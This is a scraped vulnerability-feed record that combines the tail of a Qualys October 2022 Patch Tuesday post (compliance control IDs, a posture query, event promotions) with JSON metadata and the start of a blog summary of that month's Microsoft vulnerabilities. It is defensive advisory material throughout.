A **_workaround_** is a method, sometimes used temporarily, for achieving a task or goal when the usual or planned method isn't working. Information technology often uses a workaround to overcome hardware, programming, or communication problems. Once a problem is fixed, a workaround is usually abandoned. [_Source_](<https://www.techtarget.com/whatis/definition/workaround>)

The following [Qualys Policy Compliance Control IDs (CIDs) and System Defined Controls (SDC)](<https://qualysguard.qg2.apps.qualys.com/qwebhelp/fo_portal/module_pc/controls/controls_lp.htm>) have been updated to support Microsoft recommended mitigation(s) for this Patch Tuesday:

### [**CVE-2022-37976**](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-37976>) | Active Directory Certificate Services Elevation of Privilege (EoP) Vulnerability

This vulnerability has a CVSSv3.1 score of 8.8/10.

Policy Compliance Control IDs (CIDs):

 * **4079** Status of the 'Active Directory Certificate Service'
 * **14916** Status of Windows Services
 * **24842** Status of the 'LegacyAuthenticationLevel' setting

[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): **_Exploitation Less Likely_**

* * *

### [CVE-2022-33645](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-33645>) | Windows TCP/IP Driver Denial of Service (DoS) Vulnerability

This vulnerability has a CVSSv3.1 score of 7.5/10.

Policy Compliance Control IDs (CIDs):

 * **4842** Status of the 'Internet Protocol version 6 (IPv6) components' setting

[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): **_Exploitation Less Likely_**

* * *

The following QQL will return a posture assessment for the 
CIDs for this Patch Tuesday:

    control:( id:`4079` OR id:`4842` OR id:`14916` OR id:`24842` )

 * [Prepare Your Organization for Compliance with the NYDFS Cybersecurity Regulation](<https://tinyl.io/79U7>) **_New_**
 * [Mitigating the Risk of Zero-Day Vulnerabilities by using Compensating Controls](<https://blog.qualys.com/vulnerabilities-threat-research/2022/08/23/mitigating-the-risk-of-zero-day-vulnerabilities-by-using-compensating-controls>)
 * [Policy Compliance (PC) | Policy Library Update Blogs](<https://notifications.qualys.com/tag/policy-library>)

* * *

**Patch Tuesday is Complete.**

* * *

# [This Month in Vulnerabilities and Patches](<https://gateway.on24.com/wcc/eh/3347108/category/97049/patch-tuesday>) Webinar Series

[Subscribe Now](<https://gateway.on24.com/wcc/eh/3347108/category/97049/patch-tuesday>)

The Qualys Product Management and Threat Research team members host a monthly webinar series to help our existing customers leverage the seamless integration between [Qualys Vulnerability Management Detection Response (VMDR)](<https://www.qualys.com/apps/vulnerability-management-detection-response/>) and [Qualys Patch Management](<https://www.qualys.com/apps/patch-management/>). Combining these two solutions can reduce the median time to remediate critical vulnerabilities.

During the webcast, this month’s Patch Tuesday high-impact vulnerabilities will be discussed. 
We will walk you through the necessary steps to address the key vulnerabilities using Qualys VMDR and Qualys Patch Management.

* * *

# UPCOMING EVENTS

* * *

The content within this section will spotlight upcoming Vulnerability Management, Patch Management, Threat Protection, Custom Assessment and Remediation, and Policy Compliance adjacent events available to our prospective, new, and existing customers.

## [**WEBINARS**](<https://gateway.on24.com/wcc/eh/3347108/category/91385/upcoming-webinars>)

## Introducing Qualys Workshop Wednesday

At Qualys Inc, providing cybersecurity through technology is what we do. Join us each month as we tap into the minds of Qualys experts to share how you can get the most out of your investment and understand ways in which you can quickly reduce your cyber risk exposure using the Qualys Cloud Platform. Each 45-minute monthly session, hosted on the first Wednesday of the month, will showcase practical hands-on tips and tricks, news on new capabilities and services, as well as useful customer success stories that can help you get the most out of the Qualys Cloud Platform.

**Join us for the first Workshop Wednesday on Nov 2, 2022, at 9:00 AM PDT.**

[Subscribe Now](<https://gateway.on24.com/wcc/eh/3347108/category/111238/workshop-wednesday>)

* * *

## Qualys Threat Thursdays

[Subscribe Now](<https://gateway.on24.com/wcc/eh/3347108/category/111445/threat-thursday>)

The Qualys Threat Research team invites you to join their regular monthly webinar series covering the latest threat intelligence analysis and insight.

October 2022 Threat Thursday Topic is **AsyncRAT**.

Never miss an update. [Subscribe Today](<https://gateway.on24.com/wcc/eh/3347108/category/111445/threat-thursday>)!

[Click Here](<https://tinyl.io/79BC>) to quickly navigate to Qualys Threat Thursday blog posts.

* * *

## [**CONFERENCES**](<https://www.qualys.com/qsc/locations/>)

[Register Now](<https://www.qualys.com/qsc/2022/las-vegas/register/>)

## [Qualys Annual Security Conference](<https://tinyl.io/79BB>) #QSC22

Qualys Security Conference (QSC) is a unique opportunity for the Qualys community to get together to hear the latest developments in cybersecurity, view the latest innovations from Qualys, trade best practices, share feedback, and learn tips and tricks on how security professionals work to keep their organizations secure.

## We are pleased to announce the keynote speaker for the 2022 Qualys Annual Security Conference in Las Vegas

Robert Herjavec is a globally recognized motivational, business, and cyber security leader. For the last 14 years, Robert has been well known as one of the Sharks, and executive producer of the Emmy Award-winning hit show, Shark Tank. He has served as a Cybersecurity Advisor for the Government of Canada, participated in the White House Summit on Cybersecurity, and is a member of the US Chamber of Commerce Task Force for Cybersecurity.

Robert’s keynote will highlight the growing importance of cybersecurity in today’s world.

* * *

**Explore and secure the digital journey.** Dive into the profound impact of the digital journey and explore how to build security automation from the data center to the cloud. Industry experts and Qualys leaders discuss automation strategies, preview product roadmaps, listen to your challenges, and answer your questions.

**Get inspired.** Engage with Qualys’ customer-facing teams and your peers around best practices and user case studies for applying security automation to real-world challenges.

**Sharpen your expertise.** Two days of free training cover forward-looking strategies, best practices to improve effectiveness and productivity, and core/expanded product features to up-level your security program.

**Who Should Attend?** CIOs, CSOs, and CTOs; directors and managers of network, security, and cloud; developers and DevSecOps practitioners; Qualys partners and consultants; or any forward-thinking security professional.

## Live **Training Sessions**

## [November 7](<https://www.qualys.com/qsc/2022/las-vegas/?utm_source=qualys-homepage&utm_medium=event&utm_campaign=homepage-banner-qsc-2022&utm_term=qsc-q4-2022&utm_content=qualys-homepage-qsc&leadsource=344572821#nov7>) and [November 8](<https://www.qualys.com/qsc/2022/las-vegas/?utm_source=qualys-homepage&utm_medium=event&utm_campaign=homepage-banner-qsc-2022&utm_term=qsc-q4-2022&utm_content=qualys-homepage-qsc&leadsource=344572821#nov8>)

* * *

## Live **Conference Sessions**

## [November 9](<https://www.qualys.com/qsc/2022/las-vegas/?utm_source=qualys-homepage&utm_medium=event&utm_campaign=homepage-banner-qsc-2022&utm_term=qsc-q4-2022&utm_content=qualys-homepage-qsc&leadsource=344572821#nov9>) and [November 10](<https://www.qualys.com/qsc/2022/las-vegas/?utm_source=qualys-homepage&utm_medium=event&utm_campaign=homepage-banner-qsc-2022&utm_term=qsc-q4-2022&utm_content=qualys-homepage-qsc&leadsource=344572821#nov10>)

_Attendance at QSC is complimentary. This includes access to all general sessions, breakout sessions, breakfast, lunch, breaks, and receptions._

* * *

#### #QSC22 Location and Reservation Information

November 7-10, 2022

The Venetian Resort Las Vegas, 3355 Las Vegas Blvd. South, Las Vegas, NV 89109, US

[Book your hotel here](<https://book.passkey.com/gt/218594637?gtid=9914abda1b2fe722d872e0ac3e0bdc09>) & take advantage of the discounted QSC rate of $229+ per night

Or find a conference [near you](<https://www.qualys.com/qsc/locations/>).

* * *

## This month's blog content is the result of collaboration with and contributions from:

_In order of appearance_

 * Quote: [Ankit Malhotra](<https://blog.qualys.com/author/amalhotra>), Manager, Signature Engineering
 * Quote: [Saeed Abbasi](<https://blog.qualys.com/author/sabbasi>), Manager, Vulnerability Signatures
 * QID Content: Arun Kethipelly, Manager, Signature Engineering
 * QID Content: Dianfang (Sabrina) Gao, Lead, QA Engineer
 * CAR Content: Mukesh Choudhary, Compliance Research Analyst
 * CAR Content: [Lavish Jhamb](<https://blog.qualys.com/author/ljhamb>), Solution Architect, Compliance Solutions
 * PC Content: Xiaoran (Alex) Dong, Manager, Compliance Signature Engineering
 * Webinars: Thomas Nuth, Senior Director, Product Marketing
 * Webinars: Nihal Adav, Email Marketing Specialist
 * #QSCLV22 Content: Anna Moraleda, Sr. 
Marketing Events Specialist\n\n* * *", "published": "2022-10-11T20:00:00", "modified": "2022-10-11T20:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 10.0, "baseSeverity": "CRITICAL"}, "exploitabilityScore": 3.9, "impactScore": 6.0}, "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "reporter": "Debra M. Fezza Reed", "references": [], "cvelist": ["CVE-2022-30134", "CVE-2022-3236", "CVE-2022-32894", "CVE-2022-33645", "CVE-2022-34689", "CVE-2022-35405", "CVE-2022-37968", "CVE-2022-37976", "CVE-2022-38048", "CVE-2022-40139", "CVE-2022-40684", "CVE-2022-41033", "CVE-2022-41035", "CVE-2022-41038", "CVE-2022-41040", "CVE-2022-41043", "CVE-2022-41082", "CVE-2022-41352"], "immutableFields": [], "lastseen": "2022-10-19T22:05:19", "viewCount": 241, "enchantments": {"dependencies": {"references": [{"type": "akamaiblog", "idList": ["AKAMAIBLOG:0287B84AF09C377FDC8D475774722858"]}, {"type": "apple", "idList": ["APPLE:5D20BFFCE6B79E6E7DF122C3E4FF65AC", "APPLE:94E98E15A096BFEBBCA4E7BF7D3D6C7D", "APPLE:CF4E2FCD25E41260852DC0DC2428E0AC", "APPLE:F99F855A2C143ACC1F38687F55E85474"]}, {"type": "attackerkb", "idList": ["AKB:288E3CA7-1388-488A-81D9-E93EDFFAA221", "AKB:7734F7C5-D029-4C2D-9E33-DEBEABF4E7FF", "AKB:82991046-210F-4C54-A578-8E09BD9F6D88", "AKB:9BEA97BB-44E8-4F50-B014-1DF399424D7C", "AKB:9EA74C88-E0C0-4B13-802D-551307F35B3F", "AKB:A0C8E5E1-E212-4D46-97F4-2C5A5F8F05F2", "AKB:B18222FB-1EF5-4D55-899B-61BD7ECF0FAA", "AKB:C27C2E8E-E83A-4BF5-A465-C31AC3D7B61B", "AKB:C3925834-0CCF-4765-9D28-EB57DD180308"]}, {"type": "cert", "idList": ["VU:915563"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2022-0628"]}, 
{"type": "cisa", "idList": ["CISA:8ED5E84007437E9B88D2418732B63E04"]}, {"type": "cisa_kev", "idList": ["CISA-KEV-CVE-2022-3236", "CISA-KEV-CVE-2022-32894", "CISA-KEV-CVE-2022-35405", "CISA-KEV-CVE-2022-40139", "CISA-KEV-CVE-2022-40684", "CISA-KEV-CVE-2022-41033", "CISA-KEV-CVE-2022-41040", "CISA-KEV-CVE-2022-41082"]}, {"type": "cnvd", "idList": ["CNVD-2022-58457", "CNVD-2022-67488", "CNVD-2022-67837", "CNVD-2022-67838"]}, {"type": "cve", "idList": ["CVE-2022-21979", "CVE-2022-30134", "CVE-2022-3236", "CVE-2022-32894", "CVE-2022-33645", "CVE-2022-34689", "CVE-2022-34692", "CVE-2022-35405", "CVE-2022-37968", "CVE-2022-37976", "CVE-2022-38048", "CVE-2022-38053", "CVE-2022-40139", "CVE-2022-40684", "CVE-2022-41033", "CVE-2022-41035", "CVE-2022-41036", "CVE-2022-41037", "CVE-2022-41038", "CVE-2022-41040", "CVE-2022-41043", "CVE-2022-41082", "CVE-2022-41352"]}, {"type": "fortinet", "idList": ["FG-IR-22-377"]}, {"type": "githubexploit", "idList": ["031A1BA5-EA1C-586D-8614-7558CCA5FCCB", "04705DD0-6F67-5847-B368-4ADB734EC12B", "0AA01487-E0E5-59CB-9A45-A5DE55F290A6", "0E54CE3B-3E70-59B7-BB6B-AC20C8611B38", "17DBAF5D-D221-53A1-8663-721B510E680E", "244EBCF8-4EF3-5D5B-8E3E-A832A56B7BF3", "25BE038D-91D2-5791-834B-358DB34357A7", "2DFE744C-4369-56D5-9FEA-348B4150C298", "33F59131-F1BD-56AB-8BB7-C960EFF9223C", "3410A018-A761-5411-8E58-892F756D299A", "346026AA-22B5-5F79-9544-28E8E7CFE3F2", "3722FF3F-D30D-5D5C-802E-EEA4963C6848", "45B1ADFF-A2FE-5D13-8750-9FC8E5ED13D5", "480AA36A-BFDC-54DD-AE13-43A3FE97ADCE", "501F0379-518B-5CB0-B332-836278230678", "553EF29F-6CB4-5F8F-91AD-85FC945A94E0", "567E25A0-124E-58B5-BAF5-B7651C9D74AA", "58C7CDFB-F328-57B4-ACE6-CA3966DB0EEB", "5C16D945-0879-5E51-B2AF-B106F633656A", "6064317C-299E-530F-81F1-F80C282AE68A", "6776EABD-28C1-5A42-8AB2-27BD7F492078", "68CEC596-CECA-5540-8E84-58E2E9786D22", "6D79D6F9-CC56-5F97-B1DD-2CDEE0AEC608", "6E208382-5651-5649-B6C1-F9EF3A08EA81", "77197575-9978-5136-A83D-F5FF790F2F34", "84344B5F-D0D1-5F17-B938-9A8849618A51", 
"87179042-CF32-5495-87D0-B916B42259D2", "931DCD2F-FC40-5BD3-B714-6045BAAD1857", "9905FF79-0EE2-5313-9486-DA71B70A3D88", "9945D2DB-9314-5400-8C2B-94D4BD603DD9", "A35BD9D8-6888-5724-BF89-A3A7D384D280", "A74FC70F-51E2-5B48-AC8B-D73376E8A78F", "B208F2B7-D166-5757-A090-CC1A91C9D376", "B6C642BC-915E-52EA-80B0-BC40EDC884CC", "B8464218-31FA-569A-AC74-26B347DEC285", "B8E34E3E-3FE6-5DA6-935C-2A0517D15077", "BC7AA745-CDB6-554E-B6CC-A50E97B7ECE5", "BD07E529-B3E2-5CB8-ACD4-AD7DAD69AFBD", "CDC28FA3-9C62-5164-A646-234AC30C0DA0", "CF3485E1-2E99-580B-BC50-D61EA587BA40", "D1B3FEF9-9547-51C2-B6FC-92642E47B144", "D52F3F41-2E8A-5FC2-AA35-BC6707158F1A", "D58D53CD-D047-5570-B473-DEFF8E3B0225", "D6B062D5-F610-54D9-8FD2-EFE6E9D2F8BD", "D7FAABC0-C6C7-55D7-B5DB-C0585EB16921", "E4395A48-164E-527F-8B5B-1A44D3F379B6", "E8033F3F-24AB-5402-AEA7-5583EDDC76C9", "E88B092A-CAC3-5E4D-AA85-1C01600A7A46", "EBFC1543-13D3-549C-A3B9-A6E4B17E7555", "FA1424FC-DEEC-59EB-A204-0082D635BE7E", "FE6D7F99-F6AF-559F-93A5-786367B77158"]}, {"type": "hackerone", "idList": ["H1:1719719"]}, {"type": "hackread", "idList": ["HACKREAD:E34C6E8908AE56B0B1176B1237BFDF36"]}, {"type": "hivepro", "idList": ["HIVEPRO:191275C5ECED2A57E4265562184B48DA", "HIVEPRO:33F7ACF184167B2BC236A12082041131", "HIVEPRO:621DD8CA375634712F01438EF8C1AE13", "HIVEPRO:B4C85BEFF3E49468BE44E35CEC3A7DE6", "HIVEPRO:CCB5F51160D6B20ECA6FFFB5297C4704", "HIVEPRO:F327ABE1BEFB40043AD5F33DA5692070"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:2303181B17E64D6C752ACD64C5A2B39C"]}, {"type": "jvn", "idList": ["JVN:36454862"]}, {"type": "kaspersky", "idList": ["KLA12608", "KLA19264", "KLA19267", "KLA20000", "KLA20001", "KLA20002", "KLA20004"]}, {"type": "krebs", "idList": ["KREBS:04BF4A7775A9C0B7DE1A20C71586245A", "KREBS:6E25B247DFBFC9267C00F36CE0695768", "KREBS:E877FCDD28FB558BB4B6AFF240F30EA8"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:1E762A45A948B3FD9F8A8DC65D028095", "MALWAREBYTES:2B7FA24A43BE3D53EA1E393BEC594625", 
"MALWAREBYTES:570936F207FD4A3EB4366346C255209A", "MALWAREBYTES:6B076C11790BA7213FDAD04636FDD786", "MALWAREBYTES:9446395F8878B21ADE37FDE8E05D9D37", "MALWAREBYTES:A165959E3A462AF8315F01F1020BBF53", "MALWAREBYTES:DDF3883C3A8B9A70629872FE83522C17", "MALWAREBYTES:E9F8D9962C90DF0556F1F4180FFAA7D7"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT-WINDOWS-HTTP-ZOHO_PASSWORD_MANAGER_PRO_XML_RPC_RCE-"]}, {"type": "mmpc", "idList": ["MMPC:C857BFAD4920FD5B25BF42D5469945F6"]}, {"type": "mscve", "idList": ["MS:CVE-2022-21979", "MS:CVE-2022-30134", "MS:CVE-2022-33645", "MS:CVE-2022-34689", "MS:CVE-2022-34692", "MS:CVE-2022-37968", "MS:CVE-2022-37976", "MS:CVE-2022-38048", "MS:CVE-2022-38053", "MS:CVE-2022-41033", "MS:CVE-2022-41035", "MS:CVE-2022-41036", "MS:CVE-2022-41037", "MS:CVE-2022-41038", "MS:CVE-2022-41040", "MS:CVE-2022-41043", "MS:CVE-2022-41082"]}, {"type": "mskb", "idList": ["KB5002026", "KB5002278", "KB5002279", "KB5002283", "KB5002284", "KB5002287", "KB5002288", "KB5002290", "KB5015321", "KB5015322", "KB5016616", "KB5016622", "KB5016623", "KB5016627", "KB5016629", "KB5016639", "KB5016669", "KB5016672", "KB5016676", "KB5016679", "KB5016681", "KB5016683", "KB5016684", "KB5016686", "KB5019076", "KB5019077"]}, {"type": "mssecure", "idList": ["MSSECURE:C857BFAD4920FD5B25BF42D5469945F6"]}, {"type": "nessus", "idList": ["APPLE_IOS_1561_CHECK.NBIN", "EXCHANGE_CVE-2022-41040_IOC.NBIN", "FORTIGATE_FG-IR-22-377.NASL", "MACOS_HT213413.NASL", "MACOS_HT213443.NASL", "MACOS_MS22_OCT_OFFICE.NASL", "MANAGEENGINE_ACCESS_MANAGER_PLUS_4303.NASL", "MANAGEENGINE_PAM360_5510.NASL", "MANAGEENGINE_PMP_12101.NASL", "MICROSOFT_EDGE_CHROMIUM_106_0_1370_34.NASL", "SMB_NT_MS22_AUG_EXCHANGE.NASL", "SMB_NT_MS22_OCT_5018410.NASL", "SMB_NT_MS22_OCT_5018411.NASL", "SMB_NT_MS22_OCT_5018418.NASL", "SMB_NT_MS22_OCT_5018419.NASL", "SMB_NT_MS22_OCT_5018421.NASL", "SMB_NT_MS22_OCT_5018425.NASL", "SMB_NT_MS22_OCT_5018446.NASL", "SMB_NT_MS22_OCT_5018476.NASL", "SMB_NT_MS22_OCT_5018478.NASL", 
"SMB_NT_MS22_OCT_5018479.NASL", "SMB_NT_MS22_OCT_EXCHANGE.NASL", "SMB_NT_MS22_OCT_EXCHANGE_ZERODAY.NASL", "SMB_NT_MS22_OCT_OFFICE.NASL", "SMB_NT_MS22_OCT_OFFICE_SHAREPOINT_2013.NASL", "SMB_NT_MS22_OCT_OFFICE_SHAREPOINT_2016.NASL", "SMB_NT_MS22_OCT_OFFICE_SHAREPOINT_2019.NASL", "SMB_NT_MS22_OCT_OFFICE_SHAREPOINT_SUBSCR.NASL", "SMB_NT_MS22_OCT_WORD_C2R.NASL", "TRENDMICRO_APEX_ONE_000291528.NASL", "ZIMBRA_8_8_15_P34.NASL", "ZIMBRA_9_0_0_P27.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:167918", "PACKETSTORM:169431"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:68BE1D9A35C7B4F036FE7BC4965732CC", "QUALYSBLOG:89B0E9C4C12FFA944639C5B7B34594DB", "QUALYSBLOG:AC756D2C7DB65BB8BC9FBD558B7F3AD3", "QUALYSBLOG:DE2E40D3BB574E53C7448F3A304849C9"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:2BF1C4EA2B7AB37B7A16840E193AAC4B", "RAPID7BLOG:4E867F9E4F1818A4F797C0C8A1E26598", "RAPID7BLOG:882168BD332366CE296FB09DC00E018E", "RAPID7BLOG:90A5B4252807D9A3550CB8449AA62109", "RAPID7BLOG:9191651E2ECCE625AEB7BDCAD1EA43F6", "RAPID7BLOG:B37CF2E44EB6AA38B417BB09297CD3E1", "RAPID7BLOG:FBEE52CB3C438E4C42D6212E07BEFEA9"]}, {"type": "securelist", "idList": ["SECURELIST:D585E099ED8B144A608D3789C2190854"]}, {"type": "talosblog", "idList": ["TALOSBLOG:12103F398364269083FD96139F0F6562", "TALOSBLOG:53D093A8C1C443878386CF6F108BED03", "TALOSBLOG:A0B0983119E043D75EA7712A7172A942", "TALOSBLOG:E5CB52FAF6F4E4360A360412C9377097", "TALOSBLOG:FC6B0635136460B7A28F081107A8712E"]}, {"type": "thn", "idList": ["THN:0521233945B9471C64D546BD2B006823", "THN:0F44740E1DC86B52AFAEA1D981FF08AE", "THN:221BD04ADD3814DC78AF58DFF41861F3", "THN:3474CD6C25ADD60FF37EDC1774311111", "THN:5293CFD6ACCF7BFD2EDDE976C7C06C15", "THN:54023E40C0AA4CB15793A39F3AF102AB", "THN:57FE6668281A6858EDE70EDE8EEDEE94", "THN:63560DA43FB5804E3B258BC62E210EC4", "THN:6B72050A86FFDCE9A0B2CF6F44293A1B", "THN:6C7E32993558CB9F19CAE15C18522582", "THN:7A0BB9AD4437D8A1043E4BE4BA0E915C", "THN:8200D2C2E1DD329D680C5E699177551B", 
"THN:8EF2325CBAF6720C51D9798925FE61A0", "THN:A5B36072ED31304F26AF0879E3E5710E", "THN:A60A19BF44B2CA75E63F31234992BE54", "THN:DEAEC76D89D5583101E2E6036C289609", "THN:F1EF1783ED4A37EF5E895A40CFF1DA31", "THN:FCEF4EA34B53C743863FE92365E26AFF"]}, {"type": "threatpost", "idList": ["THREATPOST:DCD8C6A45F83A5C79CA1807D2B2A4A41"]}, {"type": "wordfence", "idList": ["WORDFENCE:035A383C0D3B38D6EEBF9FE95D1A356D", "WORDFENCE:98268684EA16A81FCA6F004B3CE9D86A"]}, {"type": "zdi", "idList": ["ZDI-22-1411", "ZDI-22-1441", "ZDI-22-1442"]}, {"type": "zdt", "idList": ["1337DAY-ID-37890", "1337DAY-ID-38045"]}]}, "score": {"value": 0.0, "vector": "NONE"}, "epss": [{"cve": "CVE-2022-30134", "epss": "0.000740000", "percentile": "0.300280000", "modified": "2023-03-19"}, {"cve": "CVE-2022-3236", "epss": "0.114790000", "percentile": "0.943150000", "modified": "2023-03-19"}, {"cve": "CVE-2022-32894", "epss": "0.000740000", "percentile": "0.299620000", "modified": "2023-03-19"}, {"cve": "CVE-2022-33645", "epss": "0.000940000", "percentile": "0.383930000", "modified": "2023-03-19"}, {"cve": "CVE-2022-34689", "epss": "0.002240000", "percentile": "0.589070000", "modified": "2023-03-19"}, {"cve": "CVE-2022-35405", "epss": "0.973990000", "percentile": "0.998340000", "modified": "2023-03-19"}, {"cve": "CVE-2022-37968", "epss": "0.002280000", "percentile": "0.592430000", "modified": "2023-03-19"}, {"cve": "CVE-2022-37976", "epss": "0.000660000", "percentile": "0.267950000", "modified": "2023-03-19"}, {"cve": "CVE-2022-38048", "epss": "0.001140000", "percentile": "0.434450000", "modified": "2023-03-19"}, {"cve": "CVE-2022-40139", "epss": "0.006330000", "percentile": "0.758300000", "modified": "2023-03-19"}, {"cve": "CVE-2022-40684", "epss": "0.974510000", "percentile": "0.998980000", "modified": "2023-03-19"}, {"cve": "CVE-2022-41033", "epss": "0.002040000", "percentile": "0.566230000", "modified": "2023-03-19"}, {"cve": "CVE-2022-41035", "epss": "0.000930000", "percentile": "0.382430000", "modified": 
"2023-03-19"}, {"cve": "CVE-2022-41038", "epss": "0.003830000", "percentile": "0.688370000", "modified": "2023-03-19"}, {"cve": "CVE-2022-41040", "epss": "0.951500000", "percentile": "0.988580000", "modified": "2023-03-19"}, {"cve": "CVE-2022-41043", "epss": "0.000440000", "percentile": "0.083420000", "modified": "2023-03-19"}, {"cve": "CVE-2022-41082", "epss": "0.970140000", "percentile": "0.995460000", "modified": "2023-03-19"}, {"cve": "CVE-2022-41352", "epss": "0.969950000", "percentile": "0.995330000", "modified": "2023-03-19"}], "vulnersScore": 0.0}, "_state": {"dependencies": 1666217282, "score": 1666218028, "epss": 1679305952}, "_internal": {"score_hash": "ec7253e60e1dd8bea7b611fa3bd51297"}}
{"avleonov": [{"lastseen": "2022-10-29T17:09:42", "description": "Hello everyone! This episode will be about Microsoft Patch Tuesday for October 2022, including vulnerabilities that were added between September and October Patch Tuesdays. As usual, I use my open source [Vulristics](<https://github.com/leonov-av/vulristics>) project to create the report.\n\nAlternative video link (for Russia): <https://vk.com/video-149273431_456239106>\n \n \n $ cat comments_links.txt \n Qualys|October 2022 Patch Tuesday|https://blog.qualys.com/vulnerabilities-threat-research/2022/10/11/october-2022-patch-tuesday\n ZDI|THE OCTOBER 2022 SECURITY UPDATE REVIEW|https://www.zerodayinitiative.com/blog/2022/10/11/the-october-2022-security-update-review\n \n $python3.8 process_classify_ms_products.py # Automated classifier for Microsoft products\n \n $ python3.8 vulristics.py --report-type \"ms_patch_tuesday_extended\" --mspt-year 2022 --mspt-month \"October\" --mspt-comments-links-path \"comments_links.txt\" --rewrite-flag \"True\"\n ...\n MS PT Year: 2022\n MS PT Month: October\n MS PT Date: 2022-10-11\n MS PT CVEs found: 84\n Ext MS PT Date from: 2022-09-14\n Ext MS PT Date to: 2022-10-10\n Ext MS PT CVEs found: 21\n ALL MS PT CVEs: 105\n ...\n\nAll vulnerabilities: 105 \nUrgent: 2 \nCritical: 1 \nHigh: 29 \nMedium: 71 \nLow: 2\n\nLet's take a look at the most interesting vulnerabilities:\n\n 1. Two vulnerabilities **Remote Code Execution** - Microsoft Exchange (CVE-2022-41040, CVE-2022-41082). This is the hyped ProxyNotShell, that were disclosed on September 28. The first CVE is a **Server-Side Request Forgery (SSRF)** vulnerability, and the second one allows **Remote Code Execution (RCE)** when PowerShell is accessible to the attacker. 
While Microsoft was relatively [quick to acknowledge the vulnerabilities](<https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/>) and provide mitigation steps, their guidance has continually changed as the recommended rules to block attack traffic get bypassed. There were no patches for more than a month. At the same time, there are public exploits and signs of exploitation in the wild. Let's wait for patches to appear on the Microsoft website on the pages for [CVE-2022-41040](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41040>) and [CVE-2022-41082](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41082>).\n 2. **Elevation of Privilege** - Windows COM+ Event System Service (CVE-2022-41033). This patch fixes a bug that Microsoft lists as being used in active attacks. The impact of exploitation is loss of confidentiality, integrity, and availability. Microsoft has not disclosed how the vulnerability is being exploited or if it is being exploited in targeted or more widespread attacks. They only say that the attack complexity is low and that it requires no user interaction for the attacker to be able to achieve SYSTEM privileges. An attacker who successfully exploited this vulnerability could gain SYSTEM privileges.\n 3. In this Patch Tuesday, there were 3 vulnerabilities for which the existence of a publicly available exploit was mentioned in the Microsoft CVSS Temporal Score (Proof-of-Concept Exploit). VM vendors didn't write much about them. But it seems to me that the existence of a non-public PoC is an important enough factor to draw attention to these vulnerabilities: **Remote Code Execution** - Windows Point-to-Point Tunneling Protocol (CVE-2022-38000), **Elevation of Privilege** - Windows Graphics Component (CVE-2022-38051), **Spoofing** - Microsoft Edge (CVE-2022-41035).\n 4. **Elevation of Privilege** - Active Directory (CVE-2022-37976). 
A malicious DCOM client could force a DCOM server to authenticate to it through the Active Directory Certificate Service (ADCS) and use the credential to launch a cross-protocol attack. An attacker who successfully exploited this vulnerability could gain domain administrator privileges. Exploitability Assessment: Exploitation Less Likely.\n 5. **Elevation of Privilege** - Azure Arc-enabled Kubernetes cluster Connect (CVE-2022-37968). This vulnerability has CVSSv3 score of 10, the highest possible rating. An unauthenticated attacker could exploit this vulnerability in order to gain administrative privileges for a Kubernetes cluster. While updates have been released, users that do not have auto-upgrade enabled must take action to manually upgrade Azure Arc-enabled Kubernetes clusters.\n 6. **Remote Code Execution** - Microsoft Office (CVE-2022-38048). This bug was reported to the ZDI (Zero Day Initiative) by the researcher known as \u201chades_kito\u201d and represents a rare Critical-rated Office bug. Most Office vulnerabilities are rated Important since they involve user interaction \u2013 typically opening a file. An exception to that is when the Preview Pane is an attack vector, however, Microsoft states that isn\u2019t the case here. 
Likely the rating results from the lack of warning dialogs when opening a specially crafted file.\n\nFull Vulristics report: [ms_patch_tuesday_october2022](<https://avleonov.com/vulristics_reports/ms_patch_tuesday_october2022_report_with_comments_ext_img.html>)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-10-29T08:37:59", "type": "avleonov", "title": "Microsoft Patch Tuesday October 2022: Exchange ProxyNotShell RCE, Windows COM+ EoP, AD EoP, Azure Arc Kubernetes EoP", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2022-37968", "CVE-2022-37976", "CVE-2022-38000", "CVE-2022-38048", "CVE-2022-38051", "CVE-2022-41033", "CVE-2022-41035", "CVE-2022-41040", "CVE-2022-41082"], "modified": "2022-10-29T08:37:59", "id": "AVLEONOV:58634A9ABF4922115976139024831EB9", "href": "https://avleonov.com/2022/10/29/microsoft-patch-tuesday-october-2022-exchange-proxynotshell-rce-windows-com-eop-ad-eop-azure-arc-kubernetes-eop/", "cvss": {"score": 0.0, "vector": "NONE"}}], "malwarebytes": [{"lastseen": "2022-10-13T00:05:49", "description": "Microsoft fixed 84 vulnerabilities in its October 2022 Patch Tuesday updates. Thirteen of them received the classification 'Critical'. 
